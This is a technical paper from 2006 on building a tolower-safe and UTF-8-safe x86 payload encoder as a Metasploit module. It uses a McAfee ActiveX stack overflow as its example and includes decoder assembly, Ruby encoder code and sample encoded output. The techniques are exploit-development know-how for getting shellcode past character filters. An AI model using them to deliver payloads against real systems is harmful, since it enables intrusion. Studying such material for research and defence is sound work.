Implementing a Custom X86 Encoder
Aug, 2006
skape
mmiller@hick.org


1) Foreword

Abstract: This paper describes the process of implementing a custom
encoder for the x86 architecture. To help set the stage, the McAfee
Subscription Manager ActiveX control vulnerability, which was discovered
by eEye, will be used as an example of a vulnerability that requires the
implementation of a custom encoder.  In particular, this vulnerability
does not permit the use of uppercase characters.  To help make things
more interesting, the encoder described in this paper will also avoid
all characters above 0x7f.  This will make the encoder both UTF-8 safe
and tolower safe.

Challenge: The author believes that a UTF-8 safe and tolower safe
encoder could most likely be implemented in a much more optimized
fashion that incurs far less overhead in terms of size. If any reader
has ideas about ways in which this might be approached, feel free to
contact the author.  A bonus challenge would be to identify a geteip
technique that can be used with these character limitations.


2) Introduction

In the month of August, eEye released an advisory for a stack-based
buffer overflow that was found in the McAfee Subscription Manager
ActiveX control.  The underlying vulnerability was in an insecure call
to vsprintf that was exposed through scripting-accessible routines. At a
glance, this vulnerability would appear trivial to exploit given that
it's a very basic stack overflow.  However, once it comes to
transmitting a payload, or even a particular return address, certain
limiting factors begin to appear.  The focus of this paper will center
around an exercise in implementing a custom encoder to overcome certain
character set limitations. The McAfee Subscription Manager vulnerability
will be used as a real-world example of a vulnerability that requires a
custom encoder to exploit.

When it comes to exploiting this vulnerability, the first step is to
reproduce the conditions reported in the advisory.  As with most
vulnerabilities, it's customary to start by sending an arbitrary sequence
of bytes, such as A's. However, in this particular case, sending a
sequence of A's, each of which is 0x41, actually causes the return address
to be overwritten with 0x61's, which are lowercase a's. Judging from this,
it seems obvious that the input string is undergoing a tolower operation
and it will not be possible for the payload or return address to contain
any uppercase characters.

Given these character restrictions, it's safe to go forward with writing
the exploit.  To simply get a proof of concept for code execution, it
makes sense to put a series of int3's, represented by the 0xcc opcode,
immediately following the return address. The return address could then
be pointed to the location of a push esp / ret or some other type of
instruction that transfers control to where the series of int3's should
reside.  Once the vulnerability is triggered, the debugger should break
in at an int3 instruction, but that's not actually what happens.
Instead, it breaks in on a completely different instruction:


(4f8.58c): Unknown exception - code c0000096 (!!! second chance !!!)
eax=00000f19 ebx=00000000 ecx=00139438
edx=0013a384 esi=00001b58 edi=0013a080
eip=0013a02c esp=0013a02c ebp=36213365 iopl=0
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000
0013a02c ec              in      al,dx
0:000> u eip
0013a02c ec              in      al,dx
0013a02d ec              in      al,dx
0013a02e ec              in      al,dx
0013a02f ec              in      al,dx


Again, it looks like the buffer is undergoing some sort of transformation.  One
quick thing to notice is that 0xcc + 0x20 = 0xec.  This is similar to what
would happen when changing an uppercase character to a lowercase character,
such as where 'A', or 0x41, is converted to 'a', or 0x61, by adding 0x20.  It
appears that the operation that's performing the case lowering may also be
inadvertently performing it on a specific high ASCII range.
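
The observation can be modeled with a rough sketch.  The lower_byte and
lower_buffer helpers are hypothetical names, and the upper bound of the high
range (0xdf) is an assumption made for illustration; only the 0x41 -> 0x61 and
0xcc -> 0xec mappings come from the behavior described above.

```ruby
# Hypothetical model of the observed lowering.  The 0xc0..0xdf bound is an
# assumption; only 0x41 -> 0x61 and 0xcc -> 0xec were actually observed.
def lower_byte(b)
  if (0x41..0x5a).include?(b) || (0xc0..0xdf).include?(b)
    b + 0x20
  else
    b
  end
end

# Applies the model to every byte of a buffer and returns the byte values.
def lower_buffer(buf)
  buf.bytes.map { |b| lower_byte(b) }
end

puts lower_buffer("AAAA").map { |b| '%02x' % b }.join(' ')
puts lower_buffer("\xcc\xcc".b).map { |b| '%02x' % b }.join(' ')
```

Under this model, the int3 bytes come out as the in al,dx opcode seen in the
debugger output.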

What's actually occurring is that the subscription manager control is calling
_mbslwr, using the statically linked CRT, on a copy of the original input
string.  Internally, _mbslwr calls into __crtLCMapStringA.  Eventually this will
lead to a call out to kernel32!LCMapStringW.  The second parameter to this
routine is dwMapFlags which describes what sort of transformations, if any,
should be performed on the buffer. The _mbslwr routine passes 0x100, or
LCMAP_LOWERCASE.  This is what results in the lowering of the string.

So, given this information, it can be determined that it will not be possible
to use the characters from 0x41 through 0x5A, inclusive, as well as, for the
sake of clarity, those from 0xc0 through 0xe0.  In actuality, not all of the
characters in the latter range are bad.  The main reason this ends up causing
problems is that many of the payload encoders out there for x86, including
those in Metasploit, rely on characters from these two sets for their decoder
stub and subsequent encoded data.  For that reason, and for the challenge, it's
worth pursuing the implementation of a custom encoder.

While this particular vulnerability will permit the use of many characters
above 0x80, it makes the challenge that much more interesting, and particularly
useful, to limit the usable character set to the characters described below.
The reason this range is more useful is that the characters are UTF-8 safe
and also tolower safe.  Like most good payloads, the encoder will also avoid
NULL bytes.


0x01 -> 0x40
0x5B -> 0x7f
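
As a minimal sketch, the two ranges above can be turned into a predicate that
is handy for checking candidate bytes.  The names VALID_BYTES, valid_byte?,
and bad_offsets are hypothetical and are not part of the Metasploit Framework.

```ruby
# Bytes that are both UTF-8 safe and tolower safe, per the two ranges above.
VALID_BYTES = ((0x01..0x40).to_a + (0x5b..0x7f).to_a).freeze

def valid_byte?(b)
  VALID_BYTES.include?(b)
end

# Returns the offsets of every byte in buf that falls outside the valid set.
def bad_offsets(buf)
  buf.bytes.each_index.select { |i| !valid_byte?(buf.getbyte(i)) }
end

puts "#{VALID_BYTES.size} usable byte values"
p bad_offsets("\x6a\x04AB\x00".b)
```

An empty result from bad_offsets means that the buffer would survive the
character restrictions untouched.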


As with all encoded formats, there are actually two major pieces involved. The
first part is the encoder itself.  The encoder is responsible for taking a raw
buffer and encoding it into the appropriate format. The second part is the
decoder, which, as is probably obvious, takes the encoded form and converts it
back into the raw form so that it can be executed as a payload.  The
implementation of these two pieces will be described in the following chapters.


3) Implementing the Decoder

The implementation of the decoder involves taking the encoded form and
converting it back into the raw form.  This must all be done using assembly
instructions that will execute natively on the target machine after an exploit
has succeeded and it must also use only those instructions that fall within the
valid character set. To accomplish this, it makes sense to figure out what
instructions are available out of the valid character set. To do that, it's as
simple as generating all of the permutations of the valid characters in both
the first and second byte positions. This provides a pretty good idea of what's
available.  The end-result of such a process is a list of about 105 unique
instructions (independent of operand types).  Of those instructions the most
interesting are listed below:


add
sub
imul
inc
cmp
jcc
pusha
push
pop
and
or
xor


Some very useful instructions are available, such as add, xor, push, pop, and a
few jcc's.  While there's an obvious lack of the traditional mov instruction,
it can be made up for through a series of push and pop instructions, if needed.
With the set of valid instructions identified, it's possible to begin
implementing the decoder.  Most decoders will involve three implementation
phases.  The first phase is used to determine the base address of the decoder
stub using a geteip technique.  Following that, the encoded data must be
transformed from its character-safe form to the form that it will actually
execute from.  Finally, the decoder must transfer control into the decoded data
so that the actual payload can begin executing.  These three steps will be
described in the following sections.

In order to better understand the following sections, it's important to
describe the general approach that is going to be taken to implement the
decoder.  The stub header is used to prepare the necessary state for the decode
transforms.  The transforms themselves take the encoded data, as a series of
four byte blocks, and translate it using the process described in section 3.2.
Finally, execution falls through to the decoded data that is stored in place of
the encoded data.


3.1) Determining the Stub's Base Address


The first step in most decoder stubs will require the use of a series of
instructions, also referred to as geteip code, that obtain the location of the
current instruction pointer. The reason this is necessary is that most
decoders will have the encoded data placed immediately following the decoder
stub in memory. In order to operate on the encoded data using an absolute
address, it is necessary to determine where the data is located.  If the decoder
stub can determine the address that it's executing from, then it can determine
the address of the encoded data immediately following it in memory in a
position-independent fashion. As one might expect, the character limitations of
this challenge make it quite a bit harder to get the value of the current
instruction pointer.

There are a number of different techniques that can be used to get the value of
the instruction pointer on x86. However, the majority of these techniques rely
on the use of the call instruction. The problem with the use of the call
instruction is that it is generally composed of a high ASCII byte, such as 0xe8
or 0xff. Another technique that can be used to get the instruction pointer is
the fnstenv FPU instruction. Unfortunately, this instruction is also composed
of bytes in the high ASCII range, such as 0xd9.  Yet another approach is to use
structured exception handling to get the instruction pointer. This is
accomplished by registering an exception handler and extracting the Eip value
from the CONTEXT structure when an exception is generated.  In fact, this
approach has even been implemented in entirely alphanumeric form for Windows by
SkyLined. Unfortunately, it can't be used in this case because it relies on
uppercase characters.

With all of the known geteip techniques unusable, it seems like some
alternative method for getting the base address of the decoder stub will be
needed.  In the world of alphanumeric encoders, such as SkyLined's Alpha2, it
is common for the decoder stub to assume that a certain register contains the
base address of the decoder stub. This assumption makes the decoder more
complicated to use because it can't simply be dropped into any exploit and be
expected to work. Instead, exploits may need to be modified in order to ensure
that a register can be found that contains the location of, or some location
near, the decoder stub.

At the time of this writing, the author is not aware of a geteip technique that
can be used that is both 7-bit safe and tolower safe. Like the alphanumeric
payloads, the decoder described in this paper will be implemented using a
register that is explicitly assumed to contain a reference to some address that
is near the base address of the decoder stub. For this document, the register
that is assumed to hold the address will be ecx, but it is equally possible to
use other registers.

For this particular decoder, determining the base address is just the first
step involved in implementing the stub's header.  Once the base address has
been determined, the decoder must adjust the register that holds the base
address to point to the location of the encoded data. The reason this is
necessary is that the next step of the decoder, the transforms, depends on
knowing the location of the encoded data that they will be operating on. In
order to calculate this address, the decoder must add the size of the stub
header plus the size of all of the decode transforms to the register that
holds the base address. The end result should be that the register will hold
the address of the first encoded block.

The following disassembly shows one way that the stub header might be
implemented.  In this disassembly, ecx is assumed to point at the beginning of
the stub header:


00000000  6A12              push byte +0x12
00000002  6B3C240B          imul edi,[esp],byte +0xb
00000006  60                pusha
00000007  030C24            add ecx,[esp]
0000000A  6A19              push byte +0x19
0000000C  030C24            add ecx,[esp]
0000000F  6A04              push byte +0x4


The purpose of the first two instructions is to calculate the number of bytes
consumed by all of the decode transforms (which are described in section 3.2).
It accomplishes this by multiplying the size of each transform, which is 0xb
bytes, by the total number of transforms, which in this example is 0x12.  The
result of the multiplication, 0xc6, is stored in edi.  Since the number of
transforms is pushed as a single byte that can be no larger than 0x7f, and each
transform is capable of decoding four bytes of the raw payload, the maximum
number of bytes that can be encoded is 508 bytes.  This shouldn't be seen as
much of a limiting factor, though, as other combinations of imul can be used to
account for larger payloads.
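
The arithmetic is easy to check with a short sketch.  The constant and method
names are hypothetical; the values are the ones given in the text.

```ruby
TRANSFORM_SIZE = 0xb   # bytes occupied by one decode transform
BLOCK_SIZE     = 4     # raw payload bytes recovered by one transform
MAX_COUNT      = 0x7f  # largest count that fits in a valid push byte operand

# Number of bytes occupied by count decode transforms (the value left in edi).
def transform_bytes(count)
  count * TRANSFORM_SIZE
end

# Largest raw payload that a single push byte count can describe.
def max_payload
  MAX_COUNT * BLOCK_SIZE
end

printf("0x%x transforms occupy 0x%x bytes\n", 0x12, transform_bytes(0x12))
printf("largest payload: %d bytes\n", max_payload)
```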

Once the size of the decode transforms has been calculated, pusha is executed
in order to place the edi register at the top of the stack.  With the value of
edi at the top of the stack, the value can be added to the base address
register ecx, thus accounting for the number of bytes used by the decode
transforms.  The astute reader might ask why the value of edi is indirectly
added to ecx.  Why not just add it directly?  The answer, of course, is due to
bad characters:


00000000  01F9              add ecx,edi


It's also not possible to simply push edi onto the stack, because the push edi
instruction also contains bad characters:


00000000  57                push edi
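
The same check can be applied mechanically to any candidate encoding.  In this
sketch the valid_encoding? helper and the ENCODINGS table are hypothetical; the
opcode bytes are copied from the disassembly listings in this section.

```ruby
# True when every byte of an instruction encoding is in the valid character set.
def valid_encoding?(bytes)
  bytes.all? { |b| (0x01..0x40).include?(b) || (0x5b..0x7f).include?(b) }
end

ENCODINGS = {
  'add ecx,edi'   => [0x01, 0xf9],        # 0xf9 is above 0x7f
  'push edi'      => [0x57],              # 0x57 is an uppercase 'W'
  'pusha'         => [0x60],
  'add ecx,[esp]' => [0x03, 0x0c, 0x24],
}.freeze

ENCODINGS.each do |asm, bytes|
  puts "#{asm}: #{valid_encoding?(bytes) ? 'usable' : 'bad characters'}"
end
```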


Starting with the fifth instruction, the size of the stub header, plus any
other offsets that may need to be accounted for, are added to the base address
in order to shift the ecx register to point at the start of the encoded data.
This is accomplished by simply pushing the number of bytes to add onto the
stack and then adding them to the ecx register indirectly by adding through
[esp].

After these instructions are finished, ecx will point to the start of the
encoded data. The final instruction in the stub header is a push byte 0x4. This
instruction isn't actually used by the stub header, but it's there to set up
some necessary state that will be used by the decode transforms.  Its use will
be described in the next section.


3.2) Transforming the Encoded Data

The most important part of any decoder is the way in which it transforms the
data from its encoded form to its actual form.  For example, many of the
decoders used in the Metasploit Framework and elsewhere will xor a portion of
the encoded data with a key that results in the actual bytes of the original
payload being produced.  While this is an effective way of obtaining the desired
results, it's not possible to use such a technique with the character set
limitations currently defined in this paper.

In order to transform encoded data back to its original form, it must be
possible to produce any byte from 0x00 to 0xff using any number of combinations
of bytes that fall within the valid character set.  This means that this
decoder will be limited to using combinations of characters that fall within
0x01-0x40 and 0x5b-0x7f.  To figure out the best possible means of
accomplishing the transformation, it makes sense to investigate each of the
useful instructions that were identified earlier in this chapter.

The bitwise instructions, such as and, or, and xor are not going to be
particularly useful to this decoder.  The main reason for this is that every
byte in the valid character set has its high bit clear, so these instructions
are unable to produce values at or above 0x80 without the aid of a bit shifting
instruction. For example, while xor can produce 0x00 by combining a valid value
with itself, that's about all that it can do other than producing other values
below the 0x80 boundary.  These restrictions make the bitwise instructions
unusable.
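
The 0x80 boundary can be confirmed by brute force.  The sketch below combines
every pair of valid characters with each bitwise operator and reports the
largest result; CHARSET and reachable are hypothetical names.

```ruby
CHARSET = (0x01..0x40).to_a + (0x5b..0x7f).to_a

# All distinct results of applying op (:&, :| or :^) to two valid characters.
def reachable(op)
  CHARSET.product(CHARSET).map { |a, b| a.send(op, b) }.uniq.sort
end

[:&, :|, :^].each do |op|
  puts format('%s: largest result 0x%02x', op, reachable(op).max)
end
```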

The imul instruction could be useful in that it is possible to multiply two
characters from the valid character set together to produce values that reside
outside of the valid character set.  For example, multiplying 0x02 by 0x7f
produces 0xfe.  While this may have its uses, there are two remaining
instructions that are actually the most useful.

The add instruction can be used to produce almost all possible characters.
However, it's unable to produce a few specific values.  For example, it's
impossible to add two valid characters together to produce 0x00. It is also
impossible to add two valid characters together to produce 0xff and 0x01.
While this limitation may make it appear that the add instruction is unusable,
its saving grace is the sub instruction.

Like the add instruction, the sub instruction is capable of producing almost
all possible characters.  It is certainly capable of producing the values that
add cannot.  For example, it can produce 0x00 by subtracting 0x02 from 0x02.
It can also produce 0xff by subtracting 0x03 from 0x02.  Finally, 0x01 can be
produced by subtracting 0x02 from 0x03.  However, like the add instruction,
there are also characters that the sub instruction cannot produce.  These
characters include 0x7f, 0x80, and 0x81.
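
Both sets of gaps can be reproduced with an exhaustive search over single
bytes.  This is a sketch that ignores carries between bytes; SAFE, unreachable,
ADD_GAPS, and SUB_GAPS are hypothetical names.

```ruby
SAFE = (0x01..0x40).to_a + (0x5b..0x7f).to_a

# Byte values that no pair of valid characters can produce under the given
# operation, with the result truncated to eight bits.
def unreachable
  produced = SAFE.product(SAFE).map { |a, b| yield(a, b) & 0xff }.uniq
  (0x00..0xff).to_a - produced
end

ADD_GAPS = unreachable { |a, b| a + b }
SUB_GAPS = unreachable { |a, b| a - b }

puts 'add cannot produce: ' + ADD_GAPS.map { |b| '0x%02x' % b }.join(', ')
puts 'sub cannot produce: ' + SUB_GAPS.map { |b| '0x%02x' % b }.join(', ')
```

Since the two sets do not overlap, every byte value can be produced by at
least one of the two instructions.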

Given this analysis, it seems that using add and sub in combination is most
likely going to be the best choice when it comes to transforming encoded data
for this decoder.  With the fundamental operations selected, the next step is
to attempt to implement the code that actually performs the transformation.  In
most decoders, the transform will be accomplished through a loop that simply
performs the same operation on a pointer that is incremented by a set number of
bytes each iteration.  This type of approach results in all of the encoded data
being decoded prior to executing it.  Using this type of technique is a little
bit more complicated for this decoder, though, because it can't simply rely on
the use of a static key and it's also limited in terms of what instructions it
can use within the loop.

For these reasons, the author decided to go with an alternative technique for
the transformation portion of the decoder stub. Rather than using a loop that
iterates over the encoded data, the author chose to use a series of sequential
transformations where each block of the encoded data was decoded.  This
technique has been used before in similar situations.  One negative aspect of
using this approach over a loop-based approach is that it substantially
increases the size of the encoded payload.  While figure gives an idea of the
structure of the decoder, it doesn't give a concrete understanding of how it's
actually implemented.  It's at this point that one must descend from the lofty
high-level.  What better way to do this than diving right into the disassembly?


00000011  6830703C14        push dword 0x143c7030
00000016  5F                pop edi
00000017  0139              add [ecx],edi
00000019  030C24            add ecx,[esp]


The form of each transform will look exactly like this one.  What's actually
occurring is a four byte value is pushed onto the stack and then popped into
the edi register.  This is done in place of a mov instruction because the mov
instruction contains invalid characters.  Once the value is in the edi
register, it is either added to or subtracted from its respective encoded data
block.  The result of the add or subtract is stored in place of the previously
encoded data.  Once the transform has completed, it adds the value at the top
of the stack, which was set to 0x4 in the decoder stub header, to the register
that holds the pointer into the encoded data.  This results in the pointer
moving on to the next encoded data block so that the subsequent transform will
operate on the correct block.
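
The effect of a single add transform can be emulated in a few lines.  This is
only a sketch: apply_add is a hypothetical helper, and the operand and encoded
block are taken from the first transform of the sample msfencode output shown
at the end of chapter 4.

```ruby
# Emulates "push imm32 / pop edi / add [ecx],edi" on one four byte block.
def apply_add(encoded_block, imm32)
  word = encoded_block.pack('C4').unpack('V').first  # little-endian dword at [ecx]
  [(word + imm32) & 0xffffffff].pack('V').bytes      # value written back to [ecx]
end

DECODED = apply_add([0x06, 0x14, 0x67, 0x6b], 0x0d190c3c)
puts DECODED.map { |b| '%02x' % b }.join(' ')
```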

This simple process is all that's necessary to perform the transformations
using only valid characters.  As mentioned above, one of the negative aspects
of this approach is that it does add quite a bit of overhead to the original
payload.  For each four byte block, 11 bytes of overhead are added.  The
approach is also limited by the fact that if there is ever a portion of the raw
payload that contains characters that add cannot handle, such as 0x00, and also
contains characters that sub cannot handle, such as 0x80, then it will not be
possible to encode it.
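
To put the overhead in perspective, the total encoded size can be estimated
from the raw length.  The sketch assumes the 0x11 byte stub header shown in
section 3.1; HEADER_SIZE and encoded_size are hypothetical names.

```ruby
HEADER_SIZE = 0x11  # size of the stub header from section 3.1

# Stub header, plus one 0xb byte transform and one 4 byte encoded block for
# every four bytes of raw payload (rounded up).
def encoded_size(raw_len)
  blocks = (raw_len + 3) / 4
  HEADER_SIZE + blocks * (0xb + 4)
end

puts encoded_size(8)
```

For an eight byte payload this matches the final size reported by msfencode in
the sample run at the end of chapter 4.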


3.3) Transferring Control to the Decoded Data

Due to the way the decoder is structured, there is no need for it to include
code that directly transfers control to the decoded data.  Since this decoder
does not use any sort of looping, execution control will simply fall through to
the decoded data after all of the transformations have completed.


4) Implementing the Encoder

The encoder portion is made up of code that runs on an attacker's machine prior
to exploiting a target.  It converts the actual payload that will be executed
into the encoded format and then transmits the encoded form as the payload.
Once the target begins executing code, the decoder, as described in chapter 3,
converts the encoded payload back into its raw form and then executes it.

For the purposes of this document, the client-side encoder was implemented in
the 3.0 version of the Metasploit Framework as an encoder module for x86.  This
chapter will describe what was actually involved in implementing the encoder
module for the Metasploit Framework.

The very first step involved in implementing the encoder is to create the
appropriate file and set up the class so that it can be loaded into the
framework.  This is accomplished by placing the encoder module's file in the
appropriate directory, which in this case is modules/encoders/x86.  The name of
the module's file is important only in that the module's reference name is
derived from the filename.  For example, this encoder can be referenced as
x86/avoid_utf8_tolower based on its filename.  In this case, the module's
filename is avoid_utf8_tolower.rb. Once the file is created in the appropriate
location, the next step is to define the class and provide the framework with
the appropriate module information.

To define the class, it must be placed in the appropriate namespace that
reflects where it resides on the filesystem.  In this case, the module is placed
in the Msf::Encoders::X86 namespace.  The name of the class itself is not
important so long as it is unique within the namespace.  When defining the
class, it is important that it inherit from the Msf::Encoder base class at some
level.  This ensures that it implements all the required methods for an encoder
to function when the framework is interacting with it.

At this point, the class definition should look something like this:


require 'msf/core'

module Msf
module Encoders
module X86

class AvoidUtf8 < Msf::Encoder

end

end
end
end


With the class defined, the next step is to create a constructor and to pass
the appropriate module information down to the base class in the form of the
info hash.  This hash contains information about the module, such as name,
version, authorship, and so on.  For encoder modules, it also conveys
information about the type of encoder that's being implemented as well as
information specific to the encoder, like block size and key size.  For this
module, the constructor might look something like this:


def initialize
   super(
      'Name'             => 'Avoid UTF8/tolower',
      'Version'          => '$Revision: 1.3 $',
      'Description'      => 'UTF8 Safe, tolower Safe Encoder',
      'Author'           => 'skape',
      'Arch'             => ARCH_X86,
      'License'          => MSF_LICENSE,
      'EncoderType'      => Msf::Encoder::Type::NonUpperUtf8Safe,
      'Decoder'          =>
         {
            'KeySize'    => 4,
            'BlockSize'  => 4,
         })
end


With all of the boilerplate code out of the way, it's time to finally get into
implementing the actual encoder.  When implementing encoder modules in the 3.0
version of the Metasploit Framework, there are a few key methods that can be
overridden by a derived class.  These methods are described in detail in the
developer's guide, so an abbreviated explanation of only those useful to this
encoder will be given here.  Each method will be explained in its own
individual section.

4.1) decoder_stub

First and foremost, the decoder_stub method gives an encoder module the
opportunity to dynamically generate a decoder stub.  The framework's idea of
the decoder stub is equivalent to the stub header described in chapter 3.  In
this case, it must simply provide a buffer whose assembly will set up a
specific register to point to the start of the encoded data blocks as described
in section 3.1.  The completed version of this method might look something like
this:


def decoder_stub(state)
   len = ((state.buf.length + 3) & (~0x3)) / 4

   off = (datastore['BufferOffset'] || 0).to_i

   decoder =
      "\x6a" + [len].pack('C')      +  # push len
      "\x6b\x3c\x24\x0b"            +  # imul 0xb
      "\x60"                        +  # pusha
      "\x03\x0c\x24"                +  # add ecx, [esp]
      "\x6a" + [0x11+off].pack('C') +  # push byte 0x11 + off
      "\x03\x0c\x24"                +  # add ecx, [esp]
      "\x6a\x04"                       # push byte 0x4

   state.context = ''

   return decoder
end


In this routine, the length of the raw buffer, as found through
state.buf.length, is aligned up to a four byte boundary and then divided by
four. Following that, an optional buffer offset is stored in the off local
variable.  The purpose of the BufferOffset optional value is to allow exploits
to cause the encoder to account for extra size overhead in the ecx register
when doing its calculations.  The decoder stub is then generated using the
calculated length and offset to produce the stub header.  The stub header is
then returned to the caller.
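
The same calculation can be tried outside of the framework.  In this sketch,
block_count and stub_header are hypothetical stand-ins that take a raw length
and an offset directly rather than reading state.buf and the datastore.

```ruby
# Number of four byte blocks needed to hold raw_len bytes.
def block_count(raw_len)
  ((raw_len + 3) & ~0x3) / 4
end

# Stub header bytes for a payload of raw_len bytes and an extra offset of off.
def stub_header(raw_len, off = 0)
  [0x6a, block_count(raw_len),   # push len
   0x6b, 0x3c, 0x24, 0x0b,       # imul edi,[esp],0xb
   0x60,                         # pusha
   0x03, 0x0c, 0x24,             # add ecx,[esp]
   0x6a, 0x11 + off,             # push byte 0x11 + off
   0x03, 0x0c, 0x24,             # add ecx,[esp]
   0x6a, 0x04].pack('C*')        # push byte 0x4
end

puts stub_header(8).unpack('H*').first
```

With a 72 byte payload and an offset of 8, the operands work out to 0x12 and
0x19, which are the values that appear in the stub header listing in section
3.1.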


4.2) encode_block

The next important method to override is the encode_block method.  This method
is used by the framework to allow an encoder to encode a single block and
return the resultant encoded buffer.  The size of each block is provided to the
framework through the encoder's information hash.  For this particular encoder,
the block size is four bytes. The implementation of the encode_block routine is
as simple as trying to encode the block using either the add instruction or the
sub instruction.  Which instruction is used will depend on the bytes in the
block that is being encoded.


def encode_block(state, block)
   buf = try_add(state, block)

   if (buf.nil?)
      buf = try_sub(state, block)
   end

   if (buf.nil?)
      raise BadcharError.new(state.encoded, 0, 0, 0)
   end

   buf
end
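
The decision between the two instructions can be approximated without the
framework.  The sketch below is a simplification that only looks at the byte
values each instruction cannot produce; it ignores the additional bad
character and carry handling performed by the real routines.  The names
ADD_BAD, SUB_BAD, and pick_transform are hypothetical.

```ruby
ADD_BAD = [0x00, 0x01, 0xff].freeze  # bytes that add cannot produce
SUB_BAD = [0x7f, 0x80, 0x81].freeze  # bytes that sub cannot produce

# Returns :add, :sub, or nil when neither instruction can handle the block.
def pick_transform(block)
  bytes = block.bytes
  return :add if (bytes & ADD_BAD).empty?
  return :sub if (bytes & SUB_BAD).empty?
  nil
end

p pick_transform("\x42\x20\x80\x78".b)
p pick_transform("\x00\x84\x24\xff".b)
p pick_transform("\x00\x80\x41\x41".b)
```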


The first thing encode_block tries is add.  The try_add method is implemented as
shown below:


def try_add(state, block)
   buf  = "\x68"
   vbuf = ''
   ctx  = ''

   block.each_byte { |b|
      return nil if (b == 0xff or b == 0x01 or b == 0x00)

      begin
         xv = rand(b - 1) + 1
      end while (is_badchar(state, xv) or is_badchar(state, b - xv))

      vbuf += [xv].pack('C')
      ctx  += [b - xv].pack('C')
   }

   buf += vbuf + "\x5f\x01\x39\x03\x0c\x24"

   state.context += ctx

   return buf
end


The try_add routine enumerates each byte in the block, trying to find a random
byte that, when added to another random byte, produces the byte value in the
block.  The algorithm it uses to accomplish this is to loop selecting a random
value between 1 and the actual value.  From there a check is made to ensure
that both values are within the valid character set.  If they are both valid,
then one of the values is stored as one of the bytes of the 32-bit immediate
operand to the push instruction that is part of the decode transform for the
current block.  The second value is appended to the encoded block context.
After all bytes have been considered, the instructions that compose the decode
transform are completed and the encoded block context is appended to the string
of encoded blocks.  Finally, the decode transform is returned to the framework.
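
For a single byte, the search can be illustrated with a deterministic variant.
This sketch swaps the random selection for a linear search so that the result
is repeatable, and it checks against the fixed character set from chapter 2
rather than the framework's bad character list.  OK_BYTES and split_add are
hypothetical names.

```ruby
OK_BYTES = (0x01..0x40).to_a + (0x5b..0x7f).to_a

# Returns [x, y] with x + y == b and both values valid, or nil if none exists.
def split_add(b)
  x = OK_BYTES.find { |v| OK_BYTES.include?(b - v) }
  x && [x, b - x]
end

p split_add(0x42)
p split_add(0xcc)
p split_add(0xff)
```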

In the event that any of the bytes that compose the block being encoded by
try_add are 0x00, 0x01, or 0xff, the routine will return nil.  When this
happens, the encode_block routine will attempt to encode the block using the sub
instruction.  The implementation of the try_sub routine is shown below:


def try_sub(state, block)
   buf   = "\x68"
   vbuf  = ''
   ctx   = ''
   carry = 0

   block.each_byte { |b|
      return nil if (b == 0x80 or b == 0x81 or b == 0x7f)

      x          = 0
      y          = 0
      prev_carry = carry

      begin
         carry = prev_carry

         if (b > 0x80)
            diff  = 0x100 - b
            y     = rand(0x80 - diff - 1).to_i + 1
            x     = (0x100 - (b - y + carry))
            carry = 1
         else
            diff  = 0x7f - b
            x     = rand(diff - 1) + 1
            y     = (b + x + carry) & 0xff
            carry = 0
         end

      end while (is_badchar(state, x) or is_badchar(state, y))

      vbuf += [x].pack('C')
      ctx  += [y].pack('C')
   }

   buf += vbuf + "\x5f\x29\x39\x03\x0c\x24"

   state.context += ctx

   return buf
end


Unlike the try_add routine, the try_sub routine is a little bit more
complicated, perhaps unnecessarily.  The main reason for this is that
subtracting two 32-bit values has to take into account things like carrying
from one digit to another.  The basic idea is the same.  Each byte in the block
is enumerated.  If the byte is above 0x80, the routine calculates the
difference between 0x100 and the byte.  From there, it calculates the y value
as a random number between 1 and 0x80 minus the difference.  Using the y value,
it generates the x value as 0x100 minus the result of taking the byte value,
subtracting y, and adding the current carry flag.  To better understand this,
consider the following scenario.

Say that the byte being encoded is 0x84.  The difference between 0x100 and 0x84
is 0x7c.  A valid value of y could be 0x3, as derived from rand(0x80 - 0x7c -
1) + 1. Given this value for y, the value of x would be, assuming a zero carry
flag, 0x7f. When 0x7f, or x, is subtracted from 0x3, or y, the result is 0x84.

However, if the byte value is less than 0x80, then a different method is used
to select the x and y values.  In this case, the difference is calculated as
0x7f minus the value of the current byte.  The value of x is then assigned a
random value between 1 and the difference.  The value of y is then calculated
as the current byte plus x plus the carry flag.  For example, if the value is
0x24, then the values could be calculated as described in the following
scenario.

First, the difference between 0x7f and 0x24 is 0x5b.  The value of x could be
0x18, as derived from rand(0x5b - 1) + 1.  From there, the value of y would be
calculated as 0x3c through 0x24 + 0x18. Therefore, 0x3c - 0x18 is 0x24.

Given these two methods of calculating the individual byte values, it's
possible to encode all bytes with the exception of 0x7f, 0x80, and 0x81.  If any
one of these three bytes is encountered, the try_sub routine will return nil
and the encoding will fail.  Otherwise, the routine will complete in a fashion
similar to the try_add routine.  However, rather than using an add instruction,
it uses the sub instruction.
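
The role of the carry becomes clearer when the subtraction is performed on a
whole 32-bit block.  In the sketch below, the raw block 00 84 24 ff is split by
hand using the two scenarios above; apply_sub, STORED, and PUSHED are
hypothetical names.  Since the 0x84 byte causes a borrow, the y value chosen
for the following 0x24 byte is 0x3d rather than 0x3c.

```ruby
# Emulates "push imm32 / pop edi / sub [ecx],edi" on one four byte block.
def apply_sub(stored, imm)
  y = stored.pack('C4').unpack('V').first  # encoded dword at [ecx]
  x = imm.pack('C4').unpack('V').first     # operand of the push instruction
  [(y - x) & 0xffffffff].pack('V').bytes
end

STORED = [0x01, 0x03, 0x3d, 0x01]  # y values kept in the encoded data
PUSHED = [0x01, 0x7f, 0x18, 0x02]  # x values carried in the push operand

puts apply_sub(STORED, PUSHED).map { |b| '%02x' % b }.join(' ')
```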

4.3) encode_end


With all the encoding cruft out of the way, the final method that needs to be
overridden is encode_end.  In this method, the state.context attribute is
appended to state.encoded.  The purpose of the state.context attribute is
to hold all of the encoded data blocks that are created over the course of
encoding each block.  The state.encoded attribute is the actual decoder
including the stub header, the decode transformations, and finally, the encoded
data blocks.


def encode_end(state)
   state.encoded += state.context
end


Once encoding completes, the result might be a disassembly that looks something
like this:


$ echo -ne "\x42\x20\x80\x78\xcc\xcc\xcc\xcc"  | \
  ./msfencode -e x86/avoid_utf8_tolower -t raw | \
  ndisasm -u -
[*] x86/avoid_utf8_tolower succeeded, final size 47

00000000  6A02              push byte +0x2
00000002  6B3C240B          imul edi,[esp],byte +0xb
00000006  60                pusha
00000007  030C24            add ecx,[esp]
0000000A  6A11              push byte +0x11
0000000C  030C24            add ecx,[esp]
0000000F  6A04              push byte +0x4
00000011  683C0C190D        push dword 0xd190c3c
00000016  5F                pop edi
00000017  0139              add [ecx],edi
00000019  030C24            add ecx,[esp]
0000001C  68696A6060        push dword 0x60606a69
00000021  5F                pop edi
00000022  0139              add [ecx],edi
00000024  030C24            add ecx,[esp]
